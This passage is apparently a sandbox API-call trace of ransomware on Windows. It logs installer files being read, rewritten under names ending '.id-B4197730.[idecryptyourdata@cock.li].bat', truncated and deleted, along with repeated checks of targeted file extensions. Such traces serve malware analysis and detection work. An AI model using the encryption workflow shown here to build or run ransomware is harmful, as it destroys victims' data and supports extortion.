lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.936] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3702) returned 1 [0046.937] CloseHandle (hObject=0x2d8) returned 1 [0046.937] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 0x80 [0046.937] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.937] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.937] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.937] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.937] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.937] GetLastError () returned 0x0 [0046.937] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xe76, lpOverlapped=0x0) returned 1 [0046.963] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe80, lpOverlapped=0x0) returned 1 [0046.964] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0046.964] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0046.964] SetEndOfFile (hFile=0x2d0) returned 1 [0046.964] CloseHandle (hObject=0x2d0) returned 1 [0046.965] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.965] SetEndOfFile (hFile=0x2d8) returned 1 [0046.966] CloseHandle (hObject=0x2d8) returned 1 [0046.966] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.966] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf")) returned 1 [0046.966] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.966] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.967] lstrlenW (lpString=".doc") returned 4 [0046.967] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.967] lstrlenW (lpString=".docx") returned 5 [0046.967] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.967] lstrlenW (lpString=".pdf") returned 4 [0046.967] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.967] lstrlenW (lpString=".xls") returned 4 [0046.967] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.967] lstrlenW (lpString=".xlsx") returned 5 [0046.967] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.967] lstrlenW (lpString=".ppt") returned 4 [0046.967] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.967] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.967] lstrlenW (lpString=".zip") returned 4 [0046.967] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.967] lstrlenW (lpString=".rar") returned 4 [0046.967] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.967] lstrlenW (lpString=".bz2") returned 4 [0046.967] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.967] lstrlenW (lpString=".7z") returned 3 [0046.967] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.967] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.967] lstrlenW (lpString=".dbf") returned 4 [0046.967] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.967] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.967] lstrlenW (lpString=".1cd") returned 4 [0046.967] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.967] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.967] lstrlenW (lpString=".jpg") returned 4 [0046.967] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.968] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.968] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.968] lstrlenW (lpString=".doc") returned 4 [0046.968] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.968] lstrlenW (lpString=".docx") returned 5 [0046.968] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.968] lstrlenW (lpString=".pdf") returned 4 [0046.968] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.968] lstrlenW (lpString=".xls") returned 4 [0046.968] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.968] lstrlenW (lpString=".xlsx") returned 5 [0046.968] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.968] lstrlenW (lpString=".ppt") returned 4 [0046.968] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.968] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.968] lstrlenW (lpString=".zip") returned 4 [0046.968] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.968] lstrlenW (lpString=".rar") returned 4 [0046.968] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.968] lstrlenW (lpString=".bz2") returned 4 [0046.968] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.968] lstrlenW (lpString=".7z") returned 3 [0046.968] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.968] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.968] lstrlenW (lpString=".dbf") returned 4 [0046.968] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.968] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.968] lstrlenW (lpString=".1cd") returned 4 [0046.969] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.969] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 35 [0046.969] lstrlenW (lpString=".jpg") returned 4 [0046.969] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.969] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0046.969] lstrlenW (lpString="eula.rtf") returned 8 [0046.969] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.969] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3526) returned 1 [0046.969] CloseHandle (hObject=0x2d8) returned 1 [0046.969] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 0x80 [0046.969] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.969] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.970] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.970] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.970] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.970] GetLastError () returned 0x0 [0046.970] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xdc6, lpOverlapped=0x0) returned 1 [0047.005] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xdd0, lpOverlapped=0x0) returned 1 [0047.006] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.006] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.006] SetEndOfFile (hFile=0x2d0) returned 1 [0047.007] CloseHandle (hObject=0x2d0) returned 1 [0047.007] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.007] SetEndOfFile (hFile=0x2d8) returned 1 [0047.008] CloseHandle (hObject=0x2d8) returned 1 [0047.008] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.008] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 1 [0047.009] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.009] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.009] lstrlenW (lpString=".doc") returned 4 [0047.009] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.009] lstrlenW (lpString=".docx") returned 5 [0047.009] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.009] lstrlenW (lpString=".pdf") returned 4 [0047.009] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.009] lstrlenW (lpString=".xls") returned 4 [0047.009] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.009] lstrlenW (lpString=".xlsx") returned 5 [0047.009] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.009] lstrlenW (lpString=".ppt") returned 4 [0047.009] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.009] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.009] lstrlenW (lpString=".zip") returned 4 [0047.009] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.009] lstrlenW (lpString=".rar") returned 4 [0047.009] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.009] lstrlenW (lpString=".bz2") returned 4 [0047.009] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.009] lstrlenW (lpString=".7z") returned 3 [0047.009] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.010] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.010] lstrlenW (lpString=".dbf") returned 4 [0047.010] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.010] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.010] lstrlenW (lpString=".1cd") returned 4 [0047.010] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.010] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.010] lstrlenW (lpString=".jpg") returned 4 [0047.010] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.010] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.010] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.010] lstrlenW (lpString=".doc") returned 4 [0047.010] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.010] lstrlenW (lpString=".docx") returned 5 [0047.010] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.010] lstrlenW (lpString=".pdf") returned 4 [0047.010] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.010] lstrlenW (lpString=".xls") returned 4 [0047.010] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.010] lstrlenW (lpString=".xlsx") returned 5 [0047.010] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.010] lstrlenW (lpString=".ppt") returned 4 [0047.010] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.010] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.010] lstrlenW (lpString=".zip") returned 4 [0047.010] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.011] lstrlenW (lpString=".rar") returned 4 [0047.011] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.011] lstrlenW (lpString=".bz2") returned 4 [0047.011] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.011] lstrlenW (lpString=".7z") returned 3 [0047.011] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.011] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.011] lstrlenW (lpString=".dbf") returned 4 [0047.011] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.011] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.011] lstrlenW (lpString=".1cd") returned 4 [0047.011] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.011] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0047.011] lstrlenW (lpString=".jpg") returned 4 [0047.011] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.011] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.011] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.011] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.012] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=82962) returned 1 [0047.012] CloseHandle (hObject=0x2d8) returned 1 [0047.012] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 0x80 [0047.012] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.012] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.012] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.012] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.012] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.012] GetLastError () returned 0x0 [0047.012] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x14412, lpOverlapped=0x0) returned 1 [0047.038] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x14420, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x14420, lpOverlapped=0x0) returned 1 [0047.040] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.041] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.041] SetEndOfFile (hFile=0x2d0) returned 1 [0047.041] CloseHandle (hObject=0x2d0) returned 1 [0047.043] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.043] SetEndOfFile (hFile=0x2d8) returned 1 [0047.044] CloseHandle (hObject=0x2d8) returned 1 [0047.045] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.045] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 1 [0047.045] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.045] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.045] lstrlenW (lpString=".doc") returned 4 [0047.045] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.045] lstrlenW (lpString=".docx") returned 5 [0047.045] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.045] lstrlenW (lpString=".pdf") returned 4 [0047.045] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.045] lstrlenW (lpString=".xls") returned 4 [0047.045] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.045] lstrlenW (lpString=".xlsx") returned 5 [0047.045] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.046] lstrlenW (lpString=".ppt") returned 4 [0047.046] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.046] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.046] lstrlenW (lpString=".zip") returned 4 [0047.046] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.046] lstrlenW (lpString=".rar") returned 4 [0047.046] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.046] lstrlenW (lpString=".bz2") returned 4 [0047.046] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.046] lstrlenW (lpString=".7z") returned 3 [0047.046] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.046] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.046] lstrlenW (lpString=".dbf") returned 4 [0047.046] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.046] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.046] lstrlenW (lpString=".1cd") returned 4 [0047.046] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.046] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.046] lstrlenW (lpString=".jpg") returned 4 [0047.046] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.046] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.046] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.046] lstrlenW (lpString=".doc") returned 4 [0047.046] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.046] lstrlenW (lpString=".docx") returned 5 [0047.046] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.046] lstrlenW (lpString=".pdf") returned 4 [0047.046] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.047] lstrlenW (lpString=".xls") returned 4 [0047.047] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.047] lstrlenW (lpString=".xlsx") returned 5 [0047.047] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.047] lstrlenW (lpString=".ppt") returned 4 [0047.047] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.047] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.047] lstrlenW (lpString=".zip") returned 4 [0047.047] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.047] lstrlenW (lpString=".rar") returned 4 [0047.047] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.047] lstrlenW (lpString=".bz2") returned 4 [0047.047] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.047] lstrlenW (lpString=".7z") returned 3 [0047.047] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.047] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.047] lstrlenW (lpString=".dbf") returned 4 [0047.047] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.047] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.047] lstrlenW (lpString=".1cd") returned 4 [0047.047] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.047] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned 44 [0047.047] lstrlenW (lpString=".jpg") returned 4 [0047.047] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.047] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.048] lstrlenW (lpString="eula.rtf") returned 8 [0047.048] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.048] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=4254) returned 1 [0047.048] CloseHandle (hObject=0x2d8) returned 1 [0047.048] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 0x80 [0047.048] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.048] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.048] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.048] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.048] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.049] GetLastError () returned 0x0 [0047.049] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x109e, lpOverlapped=0x0) returned 1 [0047.117] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x10a0, lpOverlapped=0x0) returned 1 [0047.119] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, 